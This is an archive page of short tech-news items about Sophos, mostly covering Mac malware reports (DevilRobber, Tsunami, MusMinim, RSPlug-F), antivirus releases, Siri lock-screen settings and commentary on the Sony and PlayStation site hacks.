Sophos
Latest
Multiple antivirus apps are vulnerable to common security flaws
At least 28 well-known antivirus apps could be exploited by shared security flaws, and a few are still vulnerable now.
Daily Update for April 24, 2012
It's the TUAW Daily Update, your source for Apple news in a convenient audio format. You'll get all the top Apple stories of the day in three to five minutes for a quick review of what's happening in the Apple world. You can listen to today's Apple stories by clicking the inline player (requires Flash) or the non-Flash link below. To subscribe to the podcast for daily listening through iTunes, click here. No Flash? Click here to listen. Subscribe via RSS
Twenty percent of Macs examined infected with Windows malware
Sophos looked at 100,000 Mac computers and found that one in every five has some form of malware. This might sound alarming, but before you stare at your machine in disgust, you should get some perspective. The survey looked at 100,000 OS X machines that are running Sophos's free Mac anti-virus software. Sophos found that this 20 percent figure is for malware that targets Windows-based computers. Though it can be used as a vector to infect other Windows machines, it won't affect Mac users on OS X. Sophos did find that 1 in 36 Macs (2.7 percent) were infected with OS X malware. Though less than 3 percent may be concerning, it's not as alarming as the 20 percent figure that's making its way into headlines.
Kaspersky Lab: Macs not invulnerable to malware
The writing is on the wall. Our time of innocence is gone. Researchers from Kaspersky Labs claim Mac market share has finally reached the critical point, and the platform is now an attractive target for online criminals. Kaspersky told Ars Technica and other press on Thursday that, "Mac users can expect "more drive-by downloads, more Mac OS X mass-malware, and more cross-platform exploit kits with Mac-specific exploits." It's not all doom and gloom. Infections in the wild are still sparse, and Apple may slow the spread of future threats with the introduction of Gatekeeper in Mac OS X Mountain Lion. Among other things, Gatekeeper will prevent users from "unknowingly downloading and installing malicious software." If you don't want to wait for Gatekeeper, there's also several good antivirus solutions like Avast and Sophos that are available now for Mac users to download.
Two new Mac malware concerns: Tsunami and DevilRobber
As reported yesterday by Computerworld, there are two malware threats for OS X to concern yourself with (temporarily). The first, Tsunami, isn't much of a threat yet. The other, DevilRobber, may be slowing your Mac down as we speak. Here's more info on each of them. Tsunami Basically a ported version of some rather old Linux malware, Tsunami isn't being seen widely just yet. Still, the trojan appears to be evolving, and has even been updated for Macs in the variant Tsunami.A, as discussed on this ESET Security blog post. What does Tsunami do? The original was a backdoor program, which uses IRC to control your machine and coordinate Distributed Denial of Service attacks. Tsunami.A adds the ability to copy itself, and includes an updated IRC command and control server (which were not active at the time ESET wrote their post). Thus far, Tsunami is merely on the radar and appears to be in active development, but not widely disseminated yet. DevilRobber While Tsunami may be on the horizon, DevilRobber is out there right now, and could be slowing your Mac down. DevilRobber, as Intego reports, isn't just one thing, it's a Trojan horse, a backdoor (allowing control), it can steal data (and surreptitiously mine Bitcoin virtual currency) and it can send personal data to servers (thus making it spyware as well). Sounds nasty, eh? Apparently the malware installs DiabloMiner, which is used in creating Bitcoins. Using this legit software, DevilRobber, aka OSX/Miner-D, can suck up processor cycles and generate the hashes used in Bitcoin's currency. Essentially the malware is using your computer to generate Bitcoins likely without you knowing what is going on. Worse, Sophos senior tech consultant Graham Cluley told Computerworld that DevilRobber can take pictures of your screen, thus stealing sensitive info, and "it runs a script that copies information to a file called dump.txt regarding truecrypt data, Vidalia (TOR plugin for Firefox), your Safari browsing history and .bash_history" -- all of which are bad things. So how big a threat is DevilRobber? Chances are, if you don't download torrents of commercial Mac software, you're fine. Intego's Mac Security Blog has some more info on DevilRobber, but for now it doesn't appear to be widespread. Also, as with Flashback.C, some users are reporting that if you have LittleSnitch installed and enabled the malware will bail. As usual, we suggest you don't illegally download commercial software via Bittorrent and only download from trusted sources (a developer's site is a good bet, and don't forget about the Mac App Store). If you suspect your machine may be infected, schedule a trip to a local Genius Bar or use antivirus software to scan your machine.
iPhone 101: Disable Siri with iPhone passcode to prevent unauthorized use
Welcome to iPhone 101, the series that explains the basics of iPhone operation. This time, it's making sure Siri doesn't let anyone use your locked iPhone. Almost immediately after the release of the iPhone 4S, TUAW started receiving emails from readers who noticed that even when they had a passcode set on the lock screen, someone could pick up their device and issue commands to Siri. This means that unauthorized persons can easily pick up the iPhone 4S, press and hold the Home button and converse with Siri. Fortunately, there's a way to disable Siri while using a lock screen passcode. The Sophos Naked Security blog noted that those unauthorized users can do everything from writing an email or sending a text message to maliciously changing calendar appointments. Blogger Graham Cluely notes that it's easy to disable Siri while there's a passcode in effect, and wonders why Apple didn't set the iPhone 4S up that way by default. To make sure Siri is deaf to commands when there's a passcode on the iPhone 4S, enter Settings > General > Passcode Lock, and slide the Siri option to Off. Now, when your friends try to make a prank call to your girlfriend using your iPhone 4S, they'll find that Siri is unwilling to be a participant in the prank.
BBC assembles experts to comment on Sony crisis
The fact that it's been one of the worst couple of weeks for Sony -- and its customers -- cannot be disputed. However, the future of this crisis, which started a couple of weeks ago when Sony's network was hacked and user information was stolen, is anybody's guess. As such, BBC News assembled a panel of four industry experts to comment on the situation and speculate where Sony might go from here. Richard Merrin, a PR director, said that Sony demonstrated both the worst and best ways to respond to a crisis: "In the first instance, Sony waited ten days before telling users what was happening, which is a classic error in terms of communications. It knocked consumer [confidence] and damaged Sony's reputation. But with the second incident, it has acted extremely quickly and seems to be following the four golden rules in crisis PR -- to be open, honest, transparent and fast." "In terms of PR, I think Sony can turn it around," said ComputerandVideoGames.com's Tim Ingham. "Consumers are often quickly outraged by this sort of wobble from a global corporation -- but we tend to have short memories if we're not personally damaged by a given incident." The security expert, Sophos' Graham Cluley, said this doesn't change how users should protect themselves: "People need to be more careful with their passwords and make sure that they have different passwords for different online accounts." You can read the rest of the comments at BBC News.
New trojan MusMinim-A written for Mac OS X
On Saturday, information security firm Sophos reported a new "backdoor Trojan" designed to allow remote operations and password "phishing" on systems running Mac OS X. The author of the Trojan refers to his or her work as "BlackHole RAT" and claims the malware is still in beta. Indeed, Sophos, who re-named the threat "OSX/MusMinim-A," says the current code is a very basic variation of darkComet, a well-known Remote Access Trojan (RAT) for Microsoft Windows. The source code for darkComet is freely available online. The biggest threat from MusMinim appears to be its ability to display fake prompts to enter the system's administrative password. This allows the malware to collect sensitive user and password data for later use. The Trojan also allows hackers to run shell commands, send URLs to the client to open a website, and force the Mac to shut down, restart or go to sleep arbitrarily. Other "symptoms" include mysterious text files on the user's desktop and full screen alerts that force the user to reboot. Additionally, the malware threatens to grow stronger. "Im a very new Virus, under Development, so there will be much more functions when im finished," the author of the Trojan claims via its user interface. Sophos believes the new malware indicates more hackers are taking notice of the increasingly popular Mac platform. "[MusMinim] could be indicative of more underground programmers taking note of Apple's increasing market share," says Sophos on its blog. Another line from the malware's user interface supports the idea that hackers' interest in Mac OS X is growing. "I know, most people think Macs can't be infected, but look, you ARE Infected!" In an apparent response to the increase in malware threats on the Mac, Apple is reportedly working with prominent information security analysts like Charlie Miller and Dino Dai Zovi to strengthen the overall security of Mac OS X Lion, the company's forthcoming major update to its desktop operating system. It's the first time Apple has openly invited researchers to scrutinize its software while still under development. Mac OS X Lion is scheduled to be released this summer. In the meantime, Sophos tells Mac users to be cautious when installing software from less trustworthy sources. "Trojans like this are frequently distributed through pirated software downloads, torrent sites, or anywhere you may download an application expecting to need to install it," they say. Also, "patching is an important part of protection on all platforms" to prevent hackers from exploiting security vulnerabilities in web browsers, plug-ins and other applications. [via AppleInsider]
Mac malware survey finds mostly incompatible nasties
See that chart there? That's a lovely graphic conjured up by Sophos, a company that makes ends meet by offering anti-virus software. The company just so happens to also have a flavor for OS X, and based on data culled from 150,000 users, it looks as if 50,000 machines had at least one piece of malware onboard. 'Course, a sizable chunk of these listed (Mal/ASFDldr-A and Mal/Conficker-A, for example) won't even run on OS X, so having them on one's HDD does little more than take up a section of space that could otherwise be used to archive a digital image of Aunt Mary. Graham Cluley, senior technology consultant at Sophos, even stated that Sophos doesn't "see as much Mac malware as Windows malware... by a long shot," but given that its Mac edition software is totally free, you might as well give it a look if you're suddenly stricken with paranoia.
Sophos releases free Mac anti-virus package
Security company Sophos has today released a free Home Edition of its Mac virus scanner suite. This is a timely move by Sophos to get an early foothold in what could become a significant market for aftermarket OS X security tools. While it's true that Macs have, until now, enjoyed a relatively blissful life free of viruses and other malware, increasing market share means we can sadly expect to see more bad guys target us from now on. There are more examples of recent Mac security problems on the Sophos company blog, and while (of course) they are motivated to scare you into using their product, they aren't making it up either. Thanks to everyone who sent this in.
Sophos decries XP Mode vulnerability, Microsoft offers chill pill
If you're keeping score at home, Microsoft needs to bring two heavies to a fight with Google, but it can lay the smack down on an AV software firm like Sophos all by itself. Richard Jacobs, chief technology officer and master of inflammatory rhetoric at Sophos, points out that Windows 7's XP Mode makes computers vulnerable to attack due to it operating independently from the underlying OS and therefore not having the same firewall and anti-virus protection. For those who actually go to the trouble of buying and updating security software -- like say, most businesses -- this essentially doubles costs for each new Windows 7 machine. Microsoft has countered with the fact that big businesses will be using its MEDV management software, while smaller shops will be able to update the virtualized XP in the same fashion as they would a physical PC. Storm in a teacup, then? Absolutely, but you'll want to give these a read if only for the passive aggressive silliness that ensues. [Via The Register] Read - Richard Jacobs on XP Mode Read - MS chief security adviser for EMEA Roger Haibheer retorts Read - Jacobs retorts to the retort Read - MS developer James O'Neill threetorts
Sophos video shows Mac trojan caught in the act
Apple Mac malware: Caught on camera from Sophos Labs on Vimeo. It's not every day that you can watch Mac malware in action, but the team at Sophos Labs has put together the demonstration video above; it shows a malicious installer downloaded from a site pretending to serve up an HD video player, which actually carries the RSPlug-F trojan. Even though Mac users would still have to provide admin credentials to install the application (unlike Windows users, who might catch the Zlob malware just by visiting the webpage), it would be perfectly natural to go ahead and authenticate after downloading an installer... but not a good idea in this case. The fake site and bogus application are appearing in two versions, one billed as MacCinema and another trying to steal the goodwill of a legitimate Windows app called HDTV Player (the real app is from blazevideo.com). RSPlug-F does try to change your DNS settings to point at bad-guy controlled servers, which could conceivably result in you being redirected to malicious or phony sites; however, if your ISP is on the ball, those bogus DNS servers are already blocked. The only way to catch this bit of malware is via the installer, but it's easy to see how an innocent Mac user might be fooled by the convincing-seeming download site. [H/T Ars Technica Infinite Loop]
Official PlayStation site hacked, says IT company Sophos
The official US websites for SingStar Pop and God of War have been hacked, according to IT company Sophos. When visitors clicked onto the PlayStation site, they may have been greeted by a pop-up ad that claims viruses have been found on their computer. The scare tactic tries to trick people into buying anti-spyware software, and requires a visitor's credit card number.According to Sophos, the hack was implemented through a "SQL injection attack" and according to the company, "the website is still infected." However, personal visits to the PlayStation sites on our browser (Firefox 3) have not turned up anything suspicious.[Via Next-Gen]
